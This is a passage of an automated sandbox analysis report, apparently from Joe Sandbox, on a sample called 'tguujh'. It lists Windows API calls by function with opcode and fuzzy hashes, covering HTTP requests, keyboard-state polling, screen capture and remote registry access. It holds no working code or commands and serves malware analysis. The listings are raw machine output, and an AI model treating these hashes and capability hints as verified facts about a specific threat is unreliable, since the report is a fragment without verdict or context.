                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                              • API String ID: 66158676-1714406822
                                                              • Opcode ID: 75af1cd83d750d116d67aab4e276be6a94de2aa598314a1d4478ead973cbc5d5
                                                              • Instruction ID: 569476b3e9b01ce1a191e06896b608958d0a28fb7d2b7cb8366cbda19bbf26b6
                                                              • Opcode Fuzzy Hash: 75af1cd83d750d116d67aab4e276be6a94de2aa598314a1d4478ead973cbc5d5
                                                              • Instruction Fuzzy Hash: BC210136A40354EBD7606BB4AC46B6D77E4EB54F65F208129FA1ADB290DBA08C008B65
                                                              APIs
                                                              • CharLowerBuffW.USER32(00000000,00000000,00CEDCD0), ref: 00CC4E81
                                                              • _wcslen.LIBCMT ref: 00CC4E95
                                                              • _wcslen.LIBCMT ref: 00CC4EF3
                                                              • _wcslen.LIBCMT ref: 00CC4F4E
                                                              • _wcslen.LIBCMT ref: 00CC4F99
                                                              • _wcslen.LIBCMT ref: 00CC5001
                                                                • Part of subcall function 00C6FD60: _wcslen.LIBCMT ref: 00C6FD6B
                                                              • GetDriveTypeW.KERNEL32(?,00D17C10,00000061), ref: 00CC509D
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2055661098-1000479233
                                                              • Opcode ID: 3294dfe975bd6f5df8820706fe467898ba22df8ede73b75da796167b58a35fcf
                                                              • Instruction ID: b26f179a8e63dfb33ec9ae0854827c3992bbdad8a8e8f0bbf9352e2f06999916
                                                              • Opcode Fuzzy Hash: 3294dfe975bd6f5df8820706fe467898ba22df8ede73b75da796167b58a35fcf
                                                              • Instruction Fuzzy Hash: 02B1C1316087029FC714DF28D990E6AB7E5BF94760F50891DF4A6C7292DB30E985CB92
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00CEDCD0), ref: 00CD4A18
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CD4A2A
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00CEDCD0), ref: 00CD4A4F
                                                              • FreeLibrary.KERNEL32(00000000,?,00CEDCD0), ref: 00CD4A9B
                                                              • StringFromGUID2.OLE32(?,?,00000028,?,00CEDCD0), ref: 00CD4B05
                                                              • SysFreeString.OLEAUT32(00000009), ref: 00CD4BBF
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CD4C25
                                                              • SysFreeString.OLEAUT32(?), ref: 00CD4C4F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 354098117-199464113
                                                              • Opcode ID: e893f92bf274ec1cbdc1dd7d4c38c51f981f66667bea58b011bba3954ef0f410
                                                              • Instruction ID: 7790892abb11b89bb0ff06062c16166e9c08fa6c89b2e4227c3a674ee361a302
                                                              • Opcode Fuzzy Hash: e893f92bf274ec1cbdc1dd7d4c38c51f981f66667bea58b011bba3954ef0f410
                                                              • Instruction Fuzzy Hash: 79123C71A00105EFDB18DF54C884EAEB7B5FF45315F248099EA19AB351D731EE86CBA0
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CCCE0D
                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CCCE20
                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CCCE34
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CCCE4D
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00CCCE90
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CCCEA6
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CCCEB1
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CCCEE1
                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CCCF39
                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CCCF4D
                                                              • InternetCloseHandle.WININET(00000000), ref: 00CCCF58
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                              • String ID:
                                                              • API String ID: 3800310941-3916222277
                                                              • Opcode ID: 47e6c8d9103890ec686749c4ea3ccec49b6351588e664f1e38a7610f4bfba9d3
                                                              • Instruction ID: 7e1ab5b36bf59fbc3ecdfc9a7fd82f3fc9c881ce2d323b22ad67d5491e43ef6b
                                                              • Opcode Fuzzy Hash: 47e6c8d9103890ec686749c4ea3ccec49b6351588e664f1e38a7610f4bfba9d3
                                                              • Instruction Fuzzy Hash: 17514BB1500608BFDB219FA1C988FAA7BBDFF08754F10842DF95ADA250D774DA449BA0
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00CE8EF1
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F01
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F0C
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F19
                                                              • GlobalLock.KERNEL32(00000000), ref: 00CE8F27
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F36
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00CE8F3F
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F46
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CE8F57
                                                              • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00CF0C04,?), ref: 00CE8F70
                                                              • GlobalFree.KERNEL32(00000000), ref: 00CE8F80
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00CE8FA0
                                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00CE8FD0
                                                              • DeleteObject.GDI32(?), ref: 00CE8FF8
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CE900E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: 33d8f35942900976ab9efc02d800c8993e7abe11a4842688f784b743841b46a5
                                                              • Instruction ID: 9c570d1b3b6c1c43f1c8a5bf2c56141ba7fbdad07aa00d63b6e6dcef6a814b29
                                                              • Opcode Fuzzy Hash: 33d8f35942900976ab9efc02d800c8993e7abe11a4842688f784b743841b46a5
                                                              • Instruction Fuzzy Hash: 1D411A75600245AFDB11DFA5DC88FAE7BB9EF89761F104058F91ADB260DB309E45CB20
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00CD2F35
                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00CD2F45
                                                              • CreateCompatibleDC.GDI32(?), ref: 00CD2F51
                                                              • SelectObject.GDI32(00000000,?), ref: 00CD2F5E
                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00CD2FCA
                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00CD3009
                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00CD302D
                                                              • SelectObject.GDI32(?,?), ref: 00CD3035
                                                              • DeleteObject.GDI32(?), ref: 00CD303E
                                                              • DeleteDC.GDI32(?), ref: 00CD3045
                                                              • ReleaseDC.USER32(00000000,?), ref: 00CD3050
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 346cb13bd3820b4b25b78aee546fbec803105f75af53aee7bd4120656d1bd8d8
                                                              • Instruction ID: 51913bda959429749fa3532055fbbc6e138553b2806d98a97b1711ae94815508
                                                              • Opcode Fuzzy Hash: 346cb13bd3820b4b25b78aee546fbec803105f75af53aee7bd4120656d1bd8d8
                                                              • Instruction Fuzzy Hash: 7361D3B5D00219EFCF14CFE8D884AAEBBB5FF48310F24851AE656A7250D771A941DF50
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(00D22990,000000FF,00000000,00000030), ref: 00CBC888
                                                              • SetMenuItemInfoW.USER32(00D22990,00000004,00000000,00000030), ref: 00CBC8BD
                                                              • Sleep.KERNEL32(000001F4), ref: 00CBC8CF
                                                              • GetMenuItemCount.USER32(?), ref: 00CBC915
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00CBC932
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00CBC95E
                                                              • GetMenuItemID.USER32(?,?), ref: 00CBC9A5
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CBC9EB
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CBCA00
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CBCA21
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                              • String ID: 0
                                                              • API String ID: 1460738036-4108050209
                                                              • Opcode ID: 5700769760402e0cfb024bfd6e65a4f9658dccc83136de1d22c3826ff8f3e478
                                                              • Instruction ID: 380f6511827a736752aff06568c287588d2ae9763992f8b1a06ecabbb438f6b3
                                                              • Opcode Fuzzy Hash: 5700769760402e0cfb024bfd6e65a4f9658dccc83136de1d22c3826ff8f3e478
                                                              • Instruction Fuzzy Hash: 2B616CB090025AABEF21CF64D8C8AFFBBA8FB45304F040119F861A7291D735AE55DB60
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00CBE3E9
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00CBE40F
• _wcslen.LIBCMT ref: 00CBE419
• _wcsstr.LIBVCRUNTIME ref: 00CBE469
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CBE485
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CC469A
• _wcslen.LIBCMT ref: 00CC46C7
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00CC46F7
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CC4718
• RemoveDirectoryW.KERNEL32(?), ref: 00CC4728
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CC47AF
• CloseHandle.KERNEL32(00000000), ref: 00CC47BA
• CloseHandle.KERNEL32(00000000), ref: 00CC47C5
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
APIs
• timeGetTime.WINMM ref: 00CBEEE0
  • Part of subcall function 00C6F27E: timeGetTime.WINMM(?,?,00CBEF00), ref: 00C6F282
• Sleep.KERNEL32(0000000A), ref: 00CBEF0D
• EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 00CBEF31
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CBEF53
• SetActiveWindow.USER32 ref: 00CBEF72
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CBEF80
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00CBEF9F
• Sleep.KERNEL32(000000FA), ref: 00CBEFAA
• IsWindow.USER32 ref: 00CBEFB6
• EndDialog.USER32(00000000), ref: 00CBEFC7
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
APIs
• GetKeyboardState.USER32(?), ref: 00CBA8EE
• SetKeyboardState.USER32(?), ref: 00CBA959
• GetAsyncKeyState.USER32(000000A0), ref: 00CBA979
• GetKeyState.USER32(000000A0), ref: 00CBA990
• GetAsyncKeyState.USER32(000000A1), ref: 00CBA9BF
• GetKeyState.USER32(000000A1), ref: 00CBA9D0
• GetAsyncKeyState.USER32(00000011), ref: 00CBA9FC
• GetKeyState.USER32(00000011), ref: 00CBAA0A
• GetAsyncKeyState.USER32(00000012), ref: 00CBAA33
• GetKeyState.USER32(00000012), ref: 00CBAA41
• GetAsyncKeyState.USER32(0000005B), ref: 00CBAA6A
• GetKeyState.USER32(0000005B), ref: 00CBAA78
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 00CB6571
• GetWindowRect.USER32(00000000,?), ref: 00CB658A
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00CB65E8
• GetDlgItem.USER32(?,00000002), ref: 00CB65F8
• GetWindowRect.USER32(00000000,?), ref: 00CB660A
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00CB665E
• GetDlgItem.USER32(?,000003E9), ref: 00CB666C
• GetWindowRect.USER32(00000000,?), ref: 00CB667E
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00CB66C0
• GetDlgItem.USER32(?,000003EA), ref: 00CB66D3
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CB66E9
• InvalidateRect.USER32(?,00000000,00000001), ref: 00CB66F6
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
  • Part of subcall function 00C521E4: GetWindowLongW.USER32(?,000000EB), ref: 00C521F2
• GetSysColor.USER32(0000000F), ref: 00C52102
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
  • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CB1032
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CB104E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CB106A
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CB1094
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00CB10BC
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CB10C7
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CB10CC
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CE499A
• CreateCompatibleDC.GDI32(00000000), ref: 00CE49A1
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CE49B4
• SelectObject.GDI32(00000000,00000000), ref: 00CE49BC
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00CE49C7
• DeleteDC.GDI32(00000000), ref: 00CE49D1
• GetWindowLongW.USER32(?,000000EC), ref: 00CE49DB
• SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00CE49F1
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00CE49FD
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
APIs
• VariantInit.OLEAUT32(?), ref: 00CD45B9
• CoInitialize.OLE32(00000000), ref: 00CD45E7
• CoUninitialize.OLE32 ref: 00CD45F1
• _wcslen.LIBCMT ref: 00CD468A
• GetRunningObjectTable.OLE32(00000000,?), ref: 00CD470E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00CD4832
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00CD486B
• CoGetObject.OLE32(?,00000000,00CF0B64,?), ref: 00CD488A
• SetErrorMode.KERNEL32(00000000), ref: 00CD489D
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CD4921
• VariantClear.OLEAUT32(?), ref: 00CD4935
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
APIs
• CoInitialize.OLE32(00000000), ref: 00CC844D
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CC84E9
• SHGetDesktopFolder.SHELL32(?), ref: 00CC84FD
• CoCreateInstance.OLE32(00CF0CD4,00000000,00000001,00D17E8C,?), ref: 00CC8549
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CC85CE
• CoTaskMemFree.OLE32(?,?), ref: 00CC8626
• SHBrowseForFolderW.SHELL32(?), ref: 00CC86B1
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CC86D4
• CoTaskMemFree.OLE32(00000000), ref: 00CC86DB
• CoTaskMemFree.OLE32(00000000), ref: 00CC8730
• CoUninitialize.OLE32 ref: 00CC8736
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                              • String ID:
                                                              • API String ID: 2762341140-0
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00CB033F
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00CB0398
                                                              • VariantInit.OLEAUT32(?), ref: 00CB03AA
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CB03CA
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00CB041D
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CB0431
                                                              • VariantClear.OLEAUT32(?), ref: 00CB0446
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00CB0453
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CB045C
                                                              • VariantClear.OLEAUT32(?), ref: 00CB046E
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CB0479
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              APIs
                                                                • Part of subcall function 00C52441: GetWindowLongW.USER32(00000000,000000EB), ref: 00C52452
                                                              • GetSystemMetrics.USER32(0000000F), ref: 00CEA926
                                                              • GetSystemMetrics.USER32(0000000F), ref: 00CEA946
                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CEAB83
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CEABA1
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CEABC2
                                                              • ShowWindow.USER32(00000003,00000000), ref: 00CEABE1
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00CEAC06
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00CEAC29
                                                              Similarity
                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                              • String ID:
                                                              • API String ID: 1211466189-3916222277
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00CD0F19
                                                              • inet_addr.WSOCK32(?), ref: 00CD0F79
                                                              • gethostbyname.WSOCK32(?), ref: 00CD0F85
                                                              • IcmpCreateFile.IPHLPAPI ref: 00CD0F93
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CD1023
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CD1042
                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00CD1116
                                                              • WSACleanup.WSOCK32 ref: 00CD111C
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 00CC8BB1
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC8BC1
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CC8BCD
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CC8C6A
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC8C7E
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC8CB0
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CC8CE6
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CC8CEF
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                              • String ID: *.*
                                                              • API String ID: 1464919966-438819550
                                                              APIs
                                                              • CreateMenu.USER32 ref: 00CE45D8
                                                              • SetMenu.USER32(?,00000000), ref: 00CE45E7
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE466F
                                                              • IsMenu.USER32(?), ref: 00CE4683
                                                              • CreatePopupMenu.USER32 ref: 00CE468D
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CE46BA
                                                              • DrawMenuBar.USER32 ref: 00CE46C2
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                              • String ID: 0$F
                                                              • API String ID: 161812096-3044882817
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00CB27F4
                                                              • GetDlgCtrlID.USER32 ref: 00CB27FF
                                                              • GetParent.USER32 ref: 00CB281B
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB281E
                                                              • GetDlgCtrlID.USER32(?), ref: 00CB2827
                                                              • GetParent.USER32(?), ref: 00CB283B
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CB283E
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 711023334-1403004172
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00CB28D3
